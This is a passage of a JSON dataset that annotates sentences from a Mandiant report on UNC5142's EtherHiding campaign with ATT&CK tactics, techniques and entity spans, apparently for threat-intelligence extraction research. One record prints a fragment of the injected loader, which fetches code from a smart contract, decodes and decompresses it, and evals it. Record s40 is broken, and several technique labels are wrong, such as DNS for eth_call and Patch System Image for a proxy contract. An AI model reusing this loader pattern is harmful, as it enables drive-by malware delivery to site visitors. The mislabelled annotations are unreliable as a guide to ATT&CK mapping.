contracts themselves are immutable, the attackers use a clever technique.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s24-9cf310", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "Mutability (and Agility): While smart contracts themselves are immutable, the attackers use a clever technique.", "sentence_text": "They deploy a first-level smart contract that contains a pointer to a second-level smart contract.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Deploy a first-level smart contract that references a second-level smart contract to abstract functionality and evade direct detection.", "entities": [ { "text": "deploy a first-level smart contract", "start": 5, "end": 40, "label": "Action" }, { "text": "second-level smart contract", "start": 70, "end": 97, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s25-1c3fc8", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "They deploy a first-level smart contract that contains a pointer to a second-level smart contract.", "sentence_text": "The first-level contract acts as a stable entry point whose address never changes on the compromised website, directing the injected JavaScript to fetch code from a second-level contract, giving the attackers the ability to change this target without altering the compromised website.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": null, "procedure": "Injected JavaScript fetches code from a secondary smart contract to enable dynamic code retrieval.", "entities": [ { "text": "injected JavaScript", "start": 124, "end": 143, "label": "MalwareTool" }, { "text": "fetch code", "start": 147, "end": 157, "label": "Action" }, { "text": "second-level contract", "start": 165, "end": 186, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s26-deb845", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "The first-level contract acts as a stable entry point whose address never changes on the compromised website, directing the injected JavaScript to fetch code from a second-level contract, giving the attackers the ability to change this target without altering the compromised website.", "sentence_text": "Resilience\n: The use of blockchain technology for large parts of UNC5142’s infrastructure and operation increases their resiliency in the face of detection and takedown efforts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s27-75a7f0", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "Resilience\n: The use of blockchain technology for large parts of UNC5142’s infrastructure and operation increases their resiliency in the face of detection and takedown efforts.", "sentence_text": "Network based protection mechanisms are more difficult to implement for Web3 traffic compared to traditional web traffic given the lack of use of traditional URLs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s28-a129dc", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "Network based protection mechanisms are more difficult to implement for Web3 traffic compared to traditional web traffic given the lack of use of traditional URLs.", "sentence_text": "Seizure and takedown operations are also hindered given the immutability of the blockchain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s29-c991fa", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "Seizure and takedown operations are also hindered given the immutability of the blockchain.", "sentence_text": "This is further discussed later in the post.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s30-1cb2c8", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "This is further discussed later in the post.", "sentence_text": "Leveraging legitimate infrastructure:\nThe BNB Smart Chain is a legitimate platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s31-1e9143", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "Leveraging legitimate infrastructure:\nThe BNB Smart Chain is a legitimate platform.", "sentence_text": "Using it can help the malicious traffic blend in with normal activity as a means to evade detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s32-f2c439", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "Using it can help the malicious traffic blend in with normal activity as a means to evade detection.", "sentence_text": "Smart Contract Interaction CLEARSHORT stage 1 uses Web3.js , a collection of libraries that allow interaction with remote ethereum nodes using HTTP, IPC or WebSocket.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Using Web3.js to interact with smart contracts via ethereum nodes", "entities": [ { "text": "CLEARSHORT", "start": 27, "end": 37, "label": "MalwareTool" }, { "text": " HTTP", "start": 142, "end": 147, "label": "Infrastructure_Indicator" }, { "text": " IPC", "start": 148, "end": 152, "label": "Infrastructure_Indicator" }, { "text": "WebSocket", "start": 156, "end": 165, "label": "Infrastructure_Indicator" }, { "text": " uses", "start": 45, "end": 50, "label": "Action" }, { "text": "allow", "start": 92, "end": 97, "label": "Action" }, { "text": "Smart Contract", "start": 0, "end": 14, "label": "Infrastructure_Indicator" }, { "text": " Web3.js", "start": 50, "end": 58, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s33-360d00", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "Smart Contract Interaction CLEARSHORT stage 1 uses Web3.js , a collection of libraries that allow interaction with remote ethereum nodes using HTTP, IPC or WebSocket.", "sentence_text": "Typically to connect to the BNB Smart Chain via a public node like bsc-dataseed.binance[.]org .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Connecting to the BNB Smart Chain via a public node", "entities": [ { "text": "BNB Smart Chain", "start": 28, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "dataseed.binance[.]org", "start": 71, "end": 93, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s34-1e572e", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "Typically to connect to the BNB Smart Chain via a public node like bsc-dataseed.binance[.]org .", "sentence_text": "The stage 1 code contains instructions to interact with specific smart contract addresses, and calls functions defined in the contract’s Application Binary Interface (ABI).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "Interacting with smart contract addresses by calling ABI functions", "entities": [ { "text": " smart contract addresses", "start": 64, "end": 89, "label": "Infrastructure_Indicator" }, { "text": " interact", "start": 41, "end": 50, "label": "Action" }, { "text": "calls functions", "start": 95, "end": 110, "label": "Action" }, { "text": "Application Binary Interface (ABI)", "start": 137, "end": 171, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s35-826d5e", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": "The stage 1 code contains instructions to interact with specific smart contract addresses, and calls functions defined in the contract’s Application Binary Interface (ABI).", "sentence_text": "These functions return payloads, including URLs to the CLEARSHORT landing page.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Returning payloads and URLs from smart contract functions", "entities": [ { "text": "payloads", "start": 23, "end": 31, "label": "MalwareTool" }, { "text": "URL", "start": 43, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "CLEARSHORT", "start": 55, "end": 65, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s36-72bc0d", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "These functions return payloads, including URLs to the CLEARSHORT landing page.", "sentence_text": "This page is decoded and executed within the browser, displaying a fake error message to the victim.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "Decoding and executing a page in the browser to display a fake error", "entities": [ { "text": " decoded", "start": 12, "end": 20, "label": "Infrastructure_Indicator" }, { "text": "executed", "start": 25, "end": 33, "label": "Infrastructure_Indicator" }, { "text": "browser", "start": 45, "end": 52, "label": "Infrastructure_Indicator" }, { "text": "page", "start": 5, "end": 9, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s37-d4f6df", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "This page is decoded and executed within the browser, displaying a fake error message to the victim.", "sentence_text": "The lure and template of this error message has varied over time, while maintaining the goal to lure the victim to run a malicious command via the Run dialog box.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "Luring the victim to run a command via the Run dialog box", "entities": [ { "text": " malicious command", "start": 120, "end": 138, "label": "MalwareTool" }, { "text": "Run dialog box", "start": 147, "end": 161, "label": "Infrastructure_Indicator" }, { "text": "run ", "start": 115, "end": 119, "label": "Action" }, { "text": " maintaining the goal to lure the victim", "start": 71, "end": 111, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s38-93199e", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "The lure and template of this error message has varied over time, while maintaining the goal to lure the victim to run a malicious command via the Run dialog box.", "sentence_text": "The executed command ultimately results in the download and execution of a follow-on payload, which is often an infostealer.\n//", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Downloading and executing a follow-on infostealer payload", "entities": [ { "text": " executed ", "start": 3, "end": 13, "label": "Action" }, { "text": "download", "start": 47, "end": 55, "label": "Action" }, { "text": "payload", "start": 85, "end": 92, "label": "MalwareTool" }, { "text": " infostealer", "start": 111, "end": 123, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s39-5d2075", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "The executed command ultimately results in the download and execution of a follow-on payload, which is often an infostealer.\n//", "sentence_text": "Load libraries from public CDNs to intereact with blockchain and decode payloads.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Loading libraries from CDNs to interact with blockchain and decode payloads", "entities": [ { "text": "Load libraries", "start": 0, "end": 14, "label": "MalwareTool" }, { "text": " payloads", "start": 71, "end": 80, "label": "MalwareTool" }, { "text": "CDNs", "start": 27, "end": 31, "label": "Infrastructure_Indicator" }, { "text": " blockchain", "start": 49, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "intereact", "start": 35, "end": 44, "label": "Action" }, { "text": "decode", "start": 65, "end": 71, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s40-3c2650", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "Load libraries from public CDNs to intereact with blockchain and decode payloads.", "sentence_text": "\n\n\n", "start": 0, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "", "start": 82, "end": 167, "label": "Infrastructure_Indicator" }, { "text": "", "start": 168, "end": 253, "label": "Infrastructure_Indicator" }, { "text": "console.log('Start moving...');", "start": 263, "end": 294, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s41-c97c4d", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "\n\n\n\nWhen a user visits a compromised web page, the injected JavaScript executes in the browser and initiates a set of connections to one or multiple BNB smart contracts, resulting in the retrieval and rendering of the CLEARSHORT landing page (stage 2) (Figure 3).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "Executing JavaScript to connect to BNB smart contracts, retrieve, and render the CLEARSHORT stage 2 payload", "entities": [ { "text": "orchidABI", "start": 9, "end": 18, "label": "MalwareTool" }, { "text": "orchidAddress", "start": 20, "end": 33, "label": "Infrastructure_Indicator" }, { "text": "orchid.methods.tokyoSkytree().call()", "start": 102, "end": 138, "label": "MalwareTool" }, { "text": "pako.ungzip", "start": 63, "end": 74, "label": "MalwareTool" }, { "text": "eval", "start": 183, "end": 187, "label": "Action" }, { "text": " executes", "start": 436, "end": 445, "label": "Action" }, { "text": "injected JavaScript", "start": 417, "end": 436, "label": "MalwareTool" }, { "text": "CLEARSHORT", "start": 584, "end": 594, "label": "MalwareTool" }, { "text": " compromised web page", "start": 390, "end": 411, "label": "Infrastructure_Indicator" }, { "text": "browser", "start": 453, "end": 460, "label": "Infrastructure_Indicator" }, { "text": "initiates", "start": 465, "end": 474, "label": "Action" }, { "text": " BNB smart contracts", "start": 514, "end": 534, "label": "Infrastructure_Indicator" }, { "text": "rendering ", "start": 567, "end": 577, "label": "Action" }, { "text": "retrieval", "start": 553, "end": 562, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s49-a8801f", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 49, "context_before": "Contract(orchidABI, orchidAddress);\nconst decompressedScript = pako.ungzip(Uint8Array.from(atob(await orchid.methods.tokyoSkytree().call()), c => c.charCodeAt(0)), { to: 'string' });\neval(`(async () => { ${decompressedScript} })().then(() => { console.log('Moved.'); }).catch(console.error);`);\n} catch (error) { console.error('Road unavaible:', error);\n}\n});\n\nWhen a user visits a compromised web page, the injected JavaScript executes in the browser and initiates a set of connections to one or multiple BNB smart contracts, resulting in the retrieval and rendering of the CLEARSHORT landing page (stage 2) (Figure 3).", "sentence_text": "EtherHiding\nA key element of UNC5142's operations is their use of the EtherHiding technique.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1001.003", "name": "Protocol or Service Impersonation" } ], "procedure": "Using the EtherHiding technique", "entities": [ { "text": "UNC5142", "start": 29, "end": 36, "label": "ThreatActor" }, { "text": " EtherHiding", "start": 69, "end": 81, "label": "Action" }, { "text": "operations", "start": 39, "end": 49, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s50-06699b", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "EtherHiding\nA key element of UNC5142's operations is their use of the EtherHiding technique.", "sentence_text": "Instead of embedding their entire attack chain within the compromised website, they store malicious components on the BNB Smart Chain, using smart contracts as a dynamic configuration and control backend.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1001", "name": "Data Obfuscation" } ], "procedure": "Storing malicious components on the BNB Smart Chain using smart contracts", "entities": [ { "text": "embedding", "start": 11, "end": 20, "label": "Action" }, { "text": "compromised website", "start": 58, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "malicious components", "start": 90, "end": 110, "label": "MalwareTool" }, { "text": "BNB Smart Chain", "start": 118, "end": 133, "label": "Infrastructure_Indicator" }, { "text": " smart contracts", "start": 140, "end": 156, "label": "Infrastructure_Indicator" }, { "text": "using", "start": 135, "end": 140, "label": "Action" }, { "text": "store", "start": 84, "end": 89, "label": "Action" }, { "text": "control backend", "start": 188, "end": 203, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s51-941227", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "Instead of embedding their entire attack chain within the compromised website, they store malicious components on the BNB Smart Chain, using smart contracts as a dynamic configuration and control backend.", "sentence_text": "The on-chain operation is managed by one or more actor-controlled wallets.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Managing on-chain operations with controlled wallets", "entities": [ { "text": " actor-controlled wallets", "start": 48, "end": 73, "label": "ThreatActor" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s52-e91a8a", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "The on-chain operation is managed by one or more actor-controlled wallets.", "sentence_text": "These Externally Owned Accounts (EOAs)\nare used to:\nDeploy the smart contracts, establishing the foundation of the attack chain.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.006", "name": "Web Services" } ], "procedure": "Deploy smart contracts", "entities": [ { "text": "smart contracts", "start": 63, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "Deploy", "start": 52, "end": 58, "label": "Action" }, { "text": " establishing", "start": 79, "end": 92, "label": "Action" }, { "text": " Externally Owned Accounts", "start": 5, "end": 31, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s53-6927a2", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "These Externally Owned Accounts (EOAs)\nare used to:\nDeploy the smart contracts, establishing the foundation of the attack chain.", "sentence_text": "Supply the BNB needed to pay network fees for making changes to the attack infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Supply BNB to pay for network fees", "entities": [ { "text": "BNB", "start": 11, "end": 14, "label": "Infrastructure_Indicator" }, { "text": "Supply", "start": 0, "end": 6, "label": "Action" }, { "text": "pay", "start": 25, "end": 28, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s54-bfc9fb", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "Supply the BNB needed to pay network fees for making changes to the attack infrastructure.", "sentence_text": "Update pointers and data within the contracts, such as changing the address of a subsequent contract or rotating the payload decryption keys.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "Update contract pointers and data, including addresses and decryption keys", "entities": [ { "text": "Update", "start": 0, "end": 6, "label": "Action" }, { "text": " pointers and data within the contracts", "start": 6, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "contract", "start": 92, "end": 100, "label": "Infrastructure_Indicator" }, { "text": " payload decryption keys", "start": 116, "end": 140, "label": "Infrastructure_Indicator" }, { "text": "rotating", "start": 104, "end": 112, "label": "Action" }, { "text": " changing", "start": 54, "end": 63, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s55-426ee8", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "Update pointers and data within the contracts, such as changing the address of a subsequent contract or rotating the payload decryption keys.", "sentence_text": "Evolution of UNC5142 TTPs Over the past year, Mandiant Threat Defense and GTIG have observed a consistent evolution in UNC5142's TTPs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s56-7bd946", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "Evolution of UNC5142 TTPs Over the past year, Mandiant Threat Defense and GTIG have observed a consistent evolution in UNC5142's TTPs.", "sentence_text": "Their campaigns have progressed from a single-contract system to the significantly more complex three-level smart contract architecture that enables their dynamic, multi-stage approach beginning in late 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s57-ac0a5f", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 57, "context_before": "Their campaigns have progressed from a single-contract system to the significantly more complex three-level smart contract architecture that enables their dynamic, multi-stage approach beginning in late 2024.", "sentence_text": "The actor has continuously refined its social engineering lures and expanded its infrastructure, at times operating parallel sets of smart contracts to increase both the scale and resilience of their campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Refine social engineering lures and expand infrastructure, including operating parallel smart contracts", "entities": [ { "text": " refined", "start": 26, "end": 34, "label": "Action" }, { "text": "expanded", "start": 68, "end": 76, "label": "Action" }, { "text": " operating", "start": 105, "end": 115, "label": "Action" }, { "text": "smart contracts ", "start": 133, "end": 149, "label": "Infrastructure_Indicator" }, { "text": "increase", "start": 152, "end": 160, "label": "Action" }, { "text": " social engineering lures", "start": 38, "end": 63, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s58-5f891d", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 58, "context_before": "The actor has continuously refined its social engineering lures and expanded its infrastructure, at times operating parallel sets of smart contracts to increase both the scale and resilience of their campaigns.", "sentence_text": "Cloudflare Pages Abuse In late 2024, UNC5142 shifted to the use of the Cloudflare Pages service ( *.pages.dev ) to host their landing pages; previously they leveraged .shop TLD domains.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.006", "name": "Web Services" } ], "procedure": "Use Cloudflare Pages to host landing pages", "entities": [ { "text": ", UNC5142", "start": 35, "end": 44, "label": "ThreatActor" }, { "text": "shifted", "start": 45, "end": 52, "label": "Action" }, { "text": "Cloudflare Pages", "start": 0, "end": 16, "label": "Infrastructure_Indicator" }, { "text": " host", "start": 114, "end": 119, "label": "Action" }, { "text": "leveraged", "start": 157, "end": 166, "label": "Action" }, { "text": "Pages service ( *.pages.dev )", "start": 82, "end": 111, "label": "Infrastructure_Indicator" }, { "text": ".shop TLD domains", "start": 167, "end": 184, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s59-7efd7a", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 59, "context_before": "Cloudflare Pages Abuse In late 2024, UNC5142 shifted to the use of the Cloudflare Pages service ( *.pages.dev ) to host their landing pages; previously they leveraged .shop TLD domains.", "sentence_text": "Cloudflare Pages is a legitimate service maintained by Cloudflare that provides a quick mechanism for standing up a website online, leveraging Cloudflare’s network to ensure it loads swiftly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s60-904108", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 60, "context_before": "Cloudflare Pages is a legitimate service maintained by Cloudflare that provides a quick mechanism for standing up a website online, leveraging Cloudflare’s network to ensure it loads swiftly.", "sentence_text": "The Three Smart Contract System The most significant change is the shift from a single smart contract system to a three smart contract system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s61-4eff98", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 61, "context_before": "The Three Smart Contract System The most significant change is the shift from a single smart contract system to a three smart contract system.", "sentence_text": "This new architecture is an adaptation of a legitimate software design principle known as the proxy pattern , which developers use to make their contracts upgradable.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1601.001", "name": "Patch System Image" } ], "procedure": "Adapt proxy pattern to make contracts upgradable", "entities": [ { "text": "proxy pattern", "start": 94, "end": 107, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s62-aa904e", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 62, "context_before": "This new architecture is an adaptation of a legitimate software design principle known as the proxy pattern , which developers use to make their contracts upgradable.", "sentence_text": "A stable, unchangeable proxy forwards calls to a separate second-level contract that can be replaced to fix bugs or add features.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1601.001", "name": "Patch System Image" } ], "procedure": "Use proxy to forward calls to a replaceable logic contract", "entities": [ { "text": "proxy", "start": 23, "end": 28, "label": "Infrastructure_Indicator" }, { "text": "calls", "start": 38, "end": 43, "label": "Action" }, { "text": "second-level contract ", "start": 58, "end": 80, "label": "Infrastructure_Indicator" }, { "text": " bugs", "start": 107, "end": 112, "label": "MalwareTool" }, { "text": "add features", "start": 116, "end": 128, "label": "MalwareTool" }, { "text": " fix", "start": 103, "end": 107, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s63-3444b2", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 63, "context_before": "A stable, unchangeable proxy forwards calls to a separate second-level contract that can be replaced to fix bugs or add features.", "sentence_text": "This setup functions as a highly efficient Router-Logic-Storage architecture where each contract has a specific job.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s64-e61b05", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 64, "context_before": "This setup functions as a highly efficient Router-Logic-Storage architecture where each contract has a specific job.", "sentence_text": "This design allows for rapid updates to critical parts of the attack, such as the landing page URL or decryption key, without any need to modify the JavaScript on compromised websites.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1601.001", "name": "Patch System Image" } ], "procedure": "Update landing page URLs and decryption keys via smart contract architecture", "entities": [ { "text": " JavaScript", "start": 148, "end": 159, "label": "Infrastructure_Indicator" }, { "text": "compromised websites", "start": 163, "end": 183, "label": "Infrastructure_Indicator" }, { "text": "landing page URL", "start": 82, "end": 98, "label": "MalwareTool" }, { "text": "decryption key", "start": 102, "end": 116, "label": "MalwareTool" }, { "text": " rapid updates", "start": 22, "end": 36, "label": "Action" }, { "text": "modify", "start": 138, "end": 144, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s65-2b16b3", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 65, "context_before": "This design allows for rapid updates to critical parts of the attack, such as the landing page URL or decryption key, without any need to modify the JavaScript on compromised websites.", "sentence_text": "As a result, the campaigns are much more agile and resistant to takedowns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s66-0cc1cf", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 66, "context_before": "As a result, the campaigns are much more agile and resistant to takedowns.", "sentence_text": "1) Initial call to the First-Level contract:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s67-d6bec5", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 67, "context_before": "1) Initial call to the First-Level contract:", "sentence_text": "The infection begins when the injected JavaScript on a compromised website makes a eth_call to the First-Level Smart Contract (e.g., 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53 ).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "Injected JavaScript makes eth_call to First-Level Smart Contract", "entities": [ { "text": "injected JavaScript", "start": 30, "end": 49, "label": "MalwareTool" }, { "text": "compromised website", "start": 55, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "makes a eth_call ", "start": 75, "end": 92, "label": "Action" }, { "text": "First-Level Smart Contract", "start": 99, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53", "start": 133, "end": 175, "label": "Infrastructure_Indicator" }, { "text": "begins", "start": 14, "end": 20, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s68-0644e7", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 68, "context_before": "The infection begins when the injected JavaScript on a compromised website makes a eth_call to the First-Level Smart Contract (e.g., 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53 ).", "sentence_text": "The primary function of this contract is to act as a router .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s69-f4006a", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 69, "context_before": "The primary function of this contract is to act as a router .", "sentence_text": "Its job is to provide the address and Application Binary Interface (ABI) for the next stage, ensuring attackers rarely need to update the script across their vast network of compromised websites.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1601.001", "name": "Patch System Image" } ], "procedure": "Provide next-stage contract address and ABI via router contract", "entities": [ { "text": "compromised websites", "start": 174, "end": 194, "label": "Infrastructure_Indicator" }, { "text": "Application Binary Interface (ABI) ", "start": 38, "end": 73, "label": "MalwareTool" }, { "text": "ensuring", "start": 93, "end": 101, "label": "Action" }, { "text": "script", "start": 138, "end": 144, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s70-bfb06c", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 70, "context_before": "Its job is to provide the address and Application Binary Interface (ABI) for the next stage, ensuring attackers rarely need to update the script across their vast network of compromised websites.", "sentence_text": "The ABI data is returned in a compressed and base64 encoded format which the script decodes via atob()\nand then decompresses using pako.unzip to get the clean interface data.\n2)", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Decode and decompress ABI data using atob() and pako.unzip", "entities": [ { "text": "ABI data", "start": 4, "end": 12, "label": "MalwareTool" }, { "text": "script", "start": 77, "end": 83, "label": "MalwareTool" }, { "text": " atob()", "start": 95, "end": 102, "label": "MalwareTool" }, { "text": "pako.unzip", "start": 131, "end": 141, "label": 